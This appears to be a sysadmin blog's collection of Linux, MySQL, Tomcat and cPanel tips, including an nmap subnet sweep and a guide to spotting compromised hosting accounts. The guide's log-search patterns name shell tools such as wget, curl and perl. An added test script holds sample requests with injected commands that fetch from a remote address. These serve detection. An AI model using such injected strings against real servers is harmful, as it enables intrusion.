UnixServerAdmin

Server Administration & Management

How to run a file system check on your next boot

The empty file /forcefsck causes the file system check fsck to be run next time you boot up, after which it will be removed.

# touch /forcefsck

March 31, 2012 | Tips & Tricks, Unix/Linux

How to clean up cache memory of unnecessary things

First run sync to flush unwritten data out to disk.

To free pagecache:

# echo 1 > /proc/sys/vm/drop_caches

To free dentries and inodes:

# echo 2 > /proc/sys/vm/drop_caches

To free pagecache, dentries and inodes:

# echo 3 > /proc/sys/vm/drop_caches

March 29, 2012 | Tips & Tricks, Unix/Linux

network_scan.sh

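#!/bin/bash
# Find this host's 192.168.x.x address and ping-sweep its /24 subnet.
ip=$( ifconfig | grep -oE '192\.168\.[0-9]+\.[0-9]+' | head -n 1 )
if [ -z "$ip" ]; then
    echo "No 192.168.x.x address found" >&2
    exit 1
fi
echo
echo "Current IP Address of the box $ip"
# The third octet of the address identifies the subnet
sub=$( echo "$ip" | awk -F. '{print $3}' )
echo
echo "Subnet used is 192.168.$sub."
echo
echo "Checking for Computers Online on Local Network"
# -sP is a ping scan (no port scan); newer nmap releases call it -sn
nmap -sP "192.168.$sub.0-255" | grep -v 'MAC' | awk '{print $2,$3}'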

March 27, 2012 | Shell Script

How to remove spaces from file names with Linux

Windows users often put spaces in file names. I prefer dashes (-) or underscores (_) instead; they are easier to manage in the console.

# for file in *; do new=$(printf '%s' "$file" | sed -e 's/  */_/g' -e 's/_-_/-/g'); [ "$file" = "$new" ] || mv -n -- "$file" "$new"; done

March 25, 2012 | Tips & Tricks, Unix/Linux

index.jsp for tomcat cluster with HA

<%@ page language="java" %>
<%-- Cluster test page only: it displays the session ID, so remove it before the node serves real users. --%>
<HTML>
<HEAD>
<TITLE>Login using jsp</TITLE>
</HEAD>
<BODY>
<h1><font color="red">Index Page by Tomcat-2 Node-2</font></h1>
<h2><font color="blue">This is test page of Tomcat-2 of NODE-2</font></h2>
<table align="center" border="1">
<tr>
<td>Session ID --&gt; </td>
<td><%= session.getId() %></td>
</tr>
<tr>
<td>Created on --&gt; </td>
<td><%= session.getCreationTime() %></td>
</tr>
</table>
</BODY>
</HTML>

March 23, 2012 | Apache, Cluster, Tomcat

How to unify the command history file

Introduction

If you open a lot of terminal windows at once while working on Linux, you may have noticed that the commands you type in one terminal are not available in the others. Usually, once you close all the terminals and open a new one, you will see that only the commands written in one of them (the first one opened, I think) are available in the history.

That is a problem if you need a command that was typed in a terminal whose history was not saved to the history file. So how do we solve that?

A single history file

You will probably prefer to have just one history file, with all the commands you typed in any terminal window you ever opened. To accomplish this, add this line to your $HOME/.bashrc file:

shopt -s histappend

That is it.

March 21, 2012 | Tips & Tricks, Unix/Linux

How to detect a domain being attacked or attacking out in cPanel

How can we find out which domain on the server is being attacked, or is attacking out? No matter how it happened, we need to stop it and make the server stable again. It is better to do this in real time, while the server is being attacked or is attacking others, so that we can gather enough information, proof and logs. It is also recommended to document your troubleshooting process for your reference. Believe me, you will need it in the future.

I do the basic checks below:

1. Check overall server load summary using top command:

# top -c

2. Using the same command, we can see which processes use the most resources by sorting by memory (Shift+M) or by CPU usage (Shift+P).

3. Check the network and analyse which connections are flooding your server. The following commands might be useful:

3.1 Count and sort the connections to the server by remote address:

# netstat -anp | grep -E 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

3.2 If you have APF installed and are using a kernel older than 2.6.20, you can check the connection tracking table:

# cat /proc/net/ip_conntrack | cut -d ' ' -f 10 | cut -d '=' -f 2 | sort | uniq -c | sort -nr | head -n 10

3.3 Run tcpdump to analyse the packets transmitted from/to your server. The following command might help to analyse any connection to port 53 (DNS) on the eth0 interface:

# tcpdump -vvxXlnni eth0 port 53 | grep 'A?' | awk -F'?' '{print $2}'

4. Analyse the Apache status page at WHM --> Server Status --> Apache Status. To do this via the command line, you can run the following command:

# service httpd fullstatus

5. Analyse the daily process logs at WHM --> Server Status --> Daily Process Logs. Find the top 5 users that consume the most CPU percentage, memory and SQL processes.

After that, we should see some suspect account/process/user that occupies a lot of resources, whether CPU, memory or network connections. At this point, we should shortlist the suspected accounts.

Then, for each suspected account, follow the steps below:

6. Scan the public_html directory of the suspected user with an antivirus. We can use clamav, but make sure the virus definitions are updated before we do this:

6.1 Update the clamav virus definitions:

# freshclam

6.2 Scan the public_html directory of the suspected user recursively with scan result logged to scanlog.txt:

# cd /home/user/public_html

# clamscan -i -r -l scanlog.txt &

6.3 Analyse any suspected files found by clamav and quarantine them. Make sure the files cannot be executed by changing their mode to 600 with chmod.

7. Find any PHP files that contain suspicious characteristics such as base64-encoded code, and store the list in a text file called scan_base64.txt. The following commands might help:

# cd /home/user/public_html

# grep -lir --include='*.php' 'eval(base64' . > scan_base64.txt

8. Scan the raw Apache access logs for any suspicious activity. The following command might help to find scripting activity in all domains served by Apache:

# find /usr/local/apache/domlogs -type f -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

9. Analysing AWstats and bandwidth usage can also give more clues. Go to cPanel > suspected domain > Logs > Awstats. In the AWstats page, check the Hosts, Pages-URL or any related section.

There are various ways to carry out this task. For me, the steps above are enough to detect any domain/account that is attacking out or being attacked. Different administrators might use different approaches to produce the same result.
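The log search from step 8, as an added example that is not part of the original post: it counts matching requests per domain log and only accepts a command name that follows a URL delimiter, so ordinary words ending in "sh" or "cd" are not reported. The function names, the strict pattern, the log file names and the sample log lines are all constructed for this illustration, and the combined log format is assumed.

```bash
#!/bin/bash
# Added example (not from the original post): per-domain count of requests
# whose URI carries a shell command name followed by an encoded space.
# Unlike the bare (sh|cd|...)%20 pattern, the command must follow a URL
# delimiter, so "fresh%20fish" or "publish%20now" is not reported.
CMDS='wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch'
STRICT_RE="(^|[=;|&/?]|%20|%3B|%7C|%26)($CMDS)(%20|\+)"
NAIVE_RE="($CMDS)%20"   # the pattern used in step 8, kept for comparison

# count_hits REGEX LOGFILE -> number of request URIs matching REGEX
count_hits() {
    # field 7 of the combined log format is the request URI
    awk '{print $7}' "$2" | grep -Eic "$1" || true
}

# scan_domlogs DIR -> "<hits> <logfile>" per file with hits, busiest first
scan_domlogs() {
    local f n
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        n=$(count_hits "$STRICT_RE" "$f")
        if [ "$n" -gt 0 ]; then printf '%s %s\n' "$n" "${f##*/}"; fi
    done | sort -rn
}

# make_sample_logs -> path of a temp dir holding constructed log files
make_sample_logs() {
    local d p='- - [05/Mar/2012:10:00:00 +0000] "GET' s='HTTP/1.1" 200 512'
    d=$(mktemp -d)
    {
        echo "203.0.113.7 $p /index.php?page=news $s"
        echo "203.0.113.7 $p /view.php?f=x;wget%20http://198.51.100.9/a $s"
        echo "203.0.113.8 $p /view.php?f=x|perl%20/tmp/a $s"
    } > "$d/example.com"
    {
        echo "192.0.2.10 $p /search?q=fresh%20fish $s"
        echo "192.0.2.11 $p /blog/how-to-publish%20now $s"
    } > "$d/example.net"
    echo "$d"
}

logs=$(make_sample_logs)
scan_domlogs "$logs"        # report on the constructed sample logs
rm -rf "$logs"
```

On a cPanel server the directory to pass to scan_domlogs would be /usr/local/apache/domlogs, as in step 8.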

March 5, 2012 | cPanel, Security

How to Backup and Restore large MySQL Database with Compression Method

If you have a very large MySQL database, it is very hard to back up and restore using phpMyAdmin or other conventional programs.

To Backup MySQL Database

# mysqldump -u [username] -p [dbname] > [backup.sql]

The -p option on its own makes the client prompt for the password; a word placed after "-p " is read as the database name, not the password.

If your MySQL database is very big, you might want to compress the output of mysqldump.

Just use the backup command below and pipe the output to gzip; you will then get the output as a gzip file.

# mysqldump -u [username] -p [dbname] | gzip -9 > [backup.sql.gz]

To Restore MySQL Database, you need to create the database on the target machine, then use this command:

# mysql -u [username] -p [dbname] < [backup.sql]

Restore Compressed MySQL Database

# gunzip < [backup.sql.gz] | mysql -u [username] -p [dbname]

March 3, 2012 | MySQL

How to send a message to all users on linux system

To send a message to all logged-in users on a Linux system, you can use the wall command, which sends a message to everybody logged in with their message permission set to yes. The message can be given as an argument to wall, or it can be sent to wall's standard input. When using the standard input from a terminal, the message should be terminated with the EOF key (usually Control-D).

Examples
To send a message “Alert, Please disconnect from Server !”, type the following command

# wall
Alert, Please disconnect from Server !

When the message content is complete, press Control-D (CTRL+D) to send message to all users.

To display the message "Alert, Please disconnect from Server !" to all members of the admin group, use the wall command with the "-g" option as follows:

# wall -g admin
Alert, Please disconnect from Server !

When the message content is complete, press Control-D (CTRL+D) to send message to all users.

March 1, 2012 | Tips & Tricks, Unix/Linux